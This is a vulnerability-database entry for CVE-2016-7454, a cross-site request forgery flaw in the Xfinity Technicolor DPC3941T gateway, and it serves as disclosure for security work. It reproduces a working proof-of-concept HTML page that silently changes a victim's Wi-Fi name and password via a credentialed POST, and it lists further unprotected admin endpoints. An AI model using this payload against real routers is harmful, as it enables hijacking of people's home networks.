ID

VAR-E-201608-0575


CVE

cve_id:CVE-2016-7454

Trust: 1.5

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982

EDB ID

40982


TITLE

Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40982

DESCRIPTION

Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery. CVE-2016-7454. Webapps exploit for the Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 40982

AFFECTED PRODUCTS

vendor: xfinity, model: gateway, scope: -, version: -

Trust: 1.6

vendor: xfinity, model: gateway technicolor dpc3941t, scope: -, version: -

Trust: 0.5

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982 // EDBNET: 89830

EXPLOIT

# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T
# Date: 09/08/2016
# Exploit Author: Ayushman Dutta
# Version: dpc3941-P20-18-v303r20421733-160413a-CMCST
# CVE : CVE-2016-7454

The DPC3941T device is vulnerable to CSRF and has no security on its entire
admin panel.
Some of the affected links are:

<IP Address>/actionHandler/ajax_remote_management.php
<IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php
<IP Address>/actionHandler/ajax_network_diagnostic_tools.php
<IP Address>/actionHandler/ajax_at_a_glance.php

A simple HTML page with JavaScript, to which the attacker lures the victim,
can be used to change state in the application.

<html>
<head>
<title>
Lets CSRF Xfinity to change Wifi Password
</title>
</head>
<script>
function jsonreq() {
  // Form-encoded body: one configInfo field carrying the wireless settings as JSON
  var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true",
    "network_name":"MyName", "wireless_mode":"a,n,ac",
    "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true",
    "channel_number":"40", "network_password":"password",
    "broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"});
  var xmlhttp = new XMLHttpRequest();
  // Send the victim's existing gateway session cookies with the cross-site request
  xmlhttp.withCredentials = true;
  xmlhttp.open("POST",
    "http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php",
    true);
  xmlhttp.setRequestHeader("Content-Type",
    "application/x-www-form-urlencoded");
  xmlhttp.send(json_upload);
}
jsonreq();
</script>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 40982

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 40982

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40982

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 40982 // EDBNET: 89830

TAGS

tag:exploit

Trust: 0.5

tag:proof of concept

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 140121

CREDITS

Ayushman Dutta

Trust: 0.6

sources: EXPLOIT-DB: 40982

EXTERNAL IDS

db: EXPLOIT-DB, id: 40982

Trust: 1.6

db: NVD, id: CVE-2016-7454

Trust: 1.5

db: EDBNET, id: 89830

Trust: 0.6

db: PACKETSTORM, id: 140121

Trust: 0.5

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982 // EDBNET: 89830

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2016-7454

Trust: 1.5

url:https://www.exploit-db.com/exploits/40982/

Trust: 0.6

sources: PACKETSTORM: 140121 // EXPLOIT-DB: 40982 // EDBNET: 89830

SOURCES

db: PACKETSTORM, id: 140121
db: EXPLOIT-DB, id: 40982
db: EDBNET, id: 89830

LAST UPDATE DATE

2022-07-27T09:29:51.895000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM, id: 140121, date: 2016-12-12T10:11:11
db: EXPLOIT-DB, id: 40982, date: 2016-08-09T00:00:00
db: EDBNET, id: 89830, date: 2017-01-01T00:00:00